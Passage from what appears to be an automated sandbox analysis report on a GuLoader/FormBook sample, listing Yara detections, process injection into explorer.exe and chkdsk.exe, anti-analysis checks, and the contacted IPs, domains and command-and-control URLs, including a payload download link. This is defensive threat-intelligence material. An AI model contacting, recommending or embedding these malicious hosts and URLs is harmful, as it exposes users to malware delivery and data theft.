Source: explorer.exe, 0000001D.00000000.443775081.0000000006860000.00000004.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: F63V4i8eZU.exe PID: 772, type: MEMORY
Source: Yara match File source: Process Memory Space: chkdsk.exe PID: 5756, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 450884 Sample: F63V4i8eZU.exe Startdate: 19/07/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 F63V4i8eZU.exe 1 2->10         started        process3 signatures4 52 Contains functionality to detect hardware virtualization (CPUID execution measurement) 10->52 54 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 10->54 56 Tries to detect Any.run 10->56 58 3 other signatures 10->58 13 F63V4i8eZU.exe 6 10->13         started        process5 dnsIp6 34 kinmirai.org 133.130.104.18, 443, 49746 INTERQGMOInternetIncJP Japan 13->34 60 Modifies the context of a thread in another process (thread injection) 13->60 62 Tries to detect Any.run 13->62 64 Maps a DLL or memory area into another process 13->64 66 3 other signatures 13->66 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 www.howtovvbucks.com 81.17.18.196, 49753, 80 PLI-ASCH Switzerland 17->28 30 137gate.com 31.44.185.28, 80 PINDC-ASRU Russian Federation 17->30 32 22 other IPs or domains 17->32 44 System process connects to network (likely due to code injection or exploit) 17->44 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.50.252.64
 www.thehomechef.global Canada
16276 OVHFR true
35.208.122.142
 pacleanfuel.com United States
19527 GOOGLE-2US true
104.21.53.7
 www.amazonautomationbusiness.com United States
13335 CLOUDFLARENETUS true
212.32.237.90
 www.tearor.com Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL true
184.168.131.241
 mikecdmusic.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
31.44.185.28
 137gate.com Russian Federation
34665 PINDC-ASRU true
81.17.18.196
 www.howtovvbucks.com Switzerland
51852 PLI-ASCH true
66.235.200.146
 gentrypartyof8.com United States
13335 CLOUDFLARENETUS true
45.33.252.45
 www.ooweesports.com United States
26658 HENGTONG-IDC-LLCUS true
133.130.104.18
 kinmirai.org Japan 7506 INTERQGMOInternetIncJP true
34.102.136.180
 foeweifgoor73dz.com United States
15169 GOOGLEUS false
45.193.166.57
 www.oubacm.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
kinmirai.org 133.130.104.18 true
www.howtovvbucks.com 81.17.18.196 true
www.thehomechef.global 198.50.252.64 true
gentrypartyof8.com 66.235.200.146 true
foeweifgoor73dz.com 34.102.136.180 true
dunn-labs.com 34.102.136.180 true
mikecdmusic.com 184.168.131.241 true
pacleanfuel.com 35.208.122.142 true
yellow-wink.com 34.102.136.180 true
www.oubacm.com 45.193.166.57 true
www.ooweesports.com 45.33.252.45 true
137gate.com 31.44.185.28 true
www.tearor.com 212.32.237.90 true
mothererph.com 34.102.136.180 true
www.amazonautomationbusiness.com 104.21.53.7 true
www.gentrypartyof8.com unknown unknown
www.creditmystartup.com unknown unknown
www.dunn-labs.com unknown unknown
www.mothererph.com unknown unknown
www.mikecdmusic.com unknown unknown
www.bloomandbrewcafe.com unknown unknown
www.pacleanfuel.com unknown unknown
www.foeweifgoor73dz.com unknown unknown
www.yellow-wink.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.yellow-wink.com/nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o false
  • Avira URL Cloud: safe
 unknown
http://www.mothererph.com/nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg false
  • Avira URL Cloud: safe
 unknown
http://www.amazonautomationbusiness.com/nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd true
  • Avira URL Cloud: safe
 unknown
http://www.tearor.com/nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o true
  • Avira URL Cloud: safe
 unknown
http://www.mikecdmusic.com/nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o true
  • Avira URL Cloud: safe
 unknown
www.yellow-wink.com/nff/ true
  • Avira URL Cloud: safe
 low
http://www.gentrypartyof8.com/nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o true
  • Avira URL Cloud: safe
 unknown
http://www.howtovvbucks.com/nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj true
  • Avira URL Cloud: safe
 unknown
http://www.ooweesports.com/nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE true
  • Avira URL Cloud: safe
 unknown
http://www.thehomechef.global/nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB true
  • Avira URL Cloud: safe
 unknown
http://www.foeweifgoor73dz.com/nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o false
  • Avira URL Cloud: safe
 unknown
http://www.pacleanfuel.com/nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl true
  • Avira URL Cloud: safe
 unknown
http://www.dunn-labs.com/nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 false
  • Avira URL Cloud: safe
 unknown
http://www.oubacm.com/nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o true
  • Avira URL Cloud: safe
 unknown
https://kinmirai.org/wp-content/bin_QVwo true
  • Avira URL Cloud: safe
 unknown